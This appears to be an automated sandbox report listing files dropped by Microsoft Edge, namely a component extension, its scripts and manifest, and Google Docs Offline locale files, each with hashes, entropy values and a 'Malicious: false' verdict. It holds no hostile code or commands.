Preview:	{"logTime": "1004/133448", "correlationVector":"vYS73lRT+EoO2Owh9jsc+Y","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"n/KhuHPhHmYXokB31+JZz7","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"fclQx26bUZO07waFEDe6Fn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"0757l0tkKt37vNrdCKAm8w","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"uTRRkmbbqkgK/wPBCS4fct","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"2DrXipL1ngF91RN7IemK0e","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"d0GyjEgnW85fvDIojHVIXI","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"PvfzGWRutB/kmuXUK+c8XA","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"29CB75FBC4C942E0817A1F7A0E2CF647

C:\Users\user\AppData\Local\Temp\f90c0c35-21e4-47e2-885b-b3dd6d9a9cc5.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 41900
Category:	dropped
Size (bytes):	76321
Entropy (8bit):	7.996057445951542
Encrypted:	true
SSDEEP:	1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iys3BBrYunau6wpGzxue:GdS8scZNzFrMa4M+lK5/nXexue
MD5:	D7A1AC56ED4F4D17DD0524C88892C56D
SHA1:	4153CA1A9A4FD0F781ECD5BA9D2A1E68C760ECD4
SHA-256:	0A29576C4002D863B0C5AE7A0B36C0BBEB0FB9AFD16B008451D4142C07E1FF2B
SHA-512:	31503F2F6831070E887EA104296E17EE755BB6BBFB1EF2A15371534BFA2D3F0CD53862389625CF498754B071885A53E1A7F82A3546275DB1F4588E0E80BF7BEE
Malicious:	false
Preview:	...........m{..(.}...7.\...N.D.w..m..q....%XfL.I.ql..;/.....s...E...0....`..A..[o^.^Y...F_.'..."L...^.......Y..W..l...E0..YY...:.&.u?....J..U<.q."...p.ib:.g..^.q.mr.....^&.{.E.....,EAp.q.......=.=.....z^.,d.^..J.R..zI4..2b?.-D5/.^...+.G..Y..?5..k........i.,.T#........_DV....P..d2......b\..L....o....Z.}../....CU.$.-..D9`..~......=....._.2O..?....b.{...7IY.L..q....K....T..5m.d.s.4.^... ..~<..7~6OS..b...^>.......s..n....k."..G.....L...z.U...... ... .ZY...,...kU1..N...(..V.r\$..s...X.It...x.mr..W....g........9DQR....*d......;L.S.....G... .._D.{.=.zI.g.Y~...`T..p.yO..4......8$..v.J..I.%..._.d.[..du5._._...?\..8.c.....U...fy.t....q.t....T@.......:zu..\,.!.I..AN_.....FeX..h.c.i.W.......(.....Y..F...R%.\..@.. 2(e,&.76..F+...l.t.$..`...........Wi.{.U.&(.b}...}.i..,...k....!..%...&.c..D-."..SQ.......q9....)j....7.".N....AX...).d./giR....uk.....s.....^...........:...~......(hP..K.@.&..?.E0:+D\|9...U.q.cu..)t{.e...X...{.....z......LL&I6.=.

C:\Users\user\AppData\Local\Temp\scoped_dir7896_379131062\989088f6-4572-4fdb-8aca-3711d31905df.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	11185
Entropy (8bit):	7.951995436832936
Encrypted:	false
SSDEEP:	192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
MD5:	78E47DDA17341BED7BE45DCCFD89AC87
SHA1:	1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
SHA-256:	67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
SHA-512:	9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0....H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

C:\Users\user\AppData\Local\Temp\scoped_dir7896_379131062\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1753
Entropy (8bit):	5.8889033066924155
Encrypted:	false
SSDEEP:	48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
MD5:	738E757B92939B24CDBBD0EFC2601315
SHA1:	77058CBAFA625AAFBEA867052136C11AD3332143
SHA-256:	D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
SHA-512:	DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
Malicious:	false
Preview:	[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

C:\Users\user\AppData\Local\Temp\scoped_dir7896_379131062\CRX_INSTALL\content.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
Category:	dropped
Size (bytes):	9815
Entropy (8bit):	6.1716321262973315
Encrypted:	false
SSDEEP:	192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
MD5:	3D20584F7F6C8EAC79E17CCA4207FB79
SHA1:	3C16DCC27AE52431C8CDD92FBAAB0341524D3092
SHA-256:	0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
SHA-512:	315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
Malicious:	false
Preview:	(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

C:\Users\user\AppData\Local\Temp\scoped_dir7896_379131062\CRX_INSTALL\content_new.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
Category:	dropped
Size (bytes):	10388
Entropy (8bit):	6.174387413738973
Encrypted:	false
SSDEEP:	192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
MD5:	3DE1E7D989C232FC1B58F4E32DE15D64
SHA1:	42B152EA7E7F31A964914F344543B8BF14B5F558
SHA-256:	D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
SHA-512:	177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
Malicious:	false
Preview:	(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

C:\Users\user\AppData\Local\Temp\scoped_dir7896_379131062\CRX_INSTALL\manifest.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	962
Entropy (8bit):	5.698567446030411
Encrypted:	false
SSDEEP:	24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
MD5:	E805E9E69FD6ECDCA65136957B1FB3BE
SHA1:	2356F60884130C86A45D4B232A26062C7830E622
SHA-256:	5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
SHA-512:	049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
Malicious:	false
Preview:	{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\128.png

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	4982
Entropy (8bit):	7.929761711048726
Encrypted:	false
SSDEEP:	96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
MD5:	913064ADAAA4C4FA2A9D011B66B33183
SHA1:	99EA751AC2597A080706C690612AEEEE43161FC1
SHA-256:	AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
SHA-512:	162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
Malicious:	false
Preview:	.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...T.P.B...*Tx...=.Q..wv.w.....\|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......\|..}./.....e..,.K.1........W.u.v. ...\.o

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\af\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	908
Entropy (8bit):	4.512512697156616
Encrypted:	false
SSDEEP:	12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
MD5:	12403EBCCE3AE8287A9E823C0256D205
SHA1:	C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
SHA-256:	B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
SHA-512:	153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\am\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1285
Entropy (8bit):	4.702209356847184
Encrypted:	false
SSDEEP:	24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
MD5:	9721EBCE89EC51EB2BAEB4159E2E4D8C
SHA1:	58979859B28513608626B563138097DC19236F1F
SHA-256:	3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
SHA-512:	FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\ar\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1244
Entropy (8bit):	4.5533961615623735
Encrypted:	false
SSDEEP:	12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
MD5:	3EC93EA8F8422FDA079F8E5B3F386A73
SHA1:	24640131CCFB21D9BC3373C0661DA02D50350C15
SHA-256:	ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
SHA-512:	F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\az\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	977
Entropy (8bit):	4.867640976960053
Encrypted:	false
SSDEEP:	24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
MD5:	9A798FD298008074E59ECC253E2F2933
SHA1:	1E93DA985E880F3D3350FC94F5CCC498EFC8C813
SHA-256:	628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
SHA-512:	9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
Malicious:	false
Preview:	{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\be\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3107
Entropy (8bit):	3.535189746470889
Encrypted:	false
SSDEEP:	48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
MD5:	68884DFDA320B85F9FC5244C2DD00568
SHA1:	FD9C01E03320560CBBB91DC3D1917C96D792A549
SHA-256:	DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
SHA-512:	7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
Malicious:	false
Preview:	{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\bg\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1389
Entropy (8bit):	4.561317517930672
Encrypted:	false
SSDEEP:	24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
MD5:	2E6423F38E148AC5A5A041B1D5989CC0
SHA1:	88966FFE39510C06CD9F710DFAC8545672FFDCEB
SHA-256:	AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
SHA-512:	891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\bn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1763
Entropy (8bit):	4.25392954144533
Encrypted:	false
SSDEEP:	24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
MD5:	651375C6AF22E2BCD228347A45E3C2C9
SHA1:	109AC3A912326171D77869854D7300385F6E628C
SHA-256:	1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
SHA-512:	958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\ca\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	930
Entropy (8bit):	4.569672473374877
Encrypted:	false
SSDEEP:	12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
MD5:	D177261FFE5F8AB4B3796D26835F8331
SHA1:	4BE708E2FFE0F018AC183003B74353AD646C1657
SHA-256:	D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
SHA-512:	E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\cs\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	913
Entropy (8bit):	4.947221919047
Encrypted:	false
SSDEEP:	12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
MD5:	CCB00C63E4814F7C46B06E4A142F2DE9
SHA1:	860936B2A500CE09498B07A457E0CCA6B69C5C23
SHA-256:	21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
SHA-512:	35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
Malicious:	false
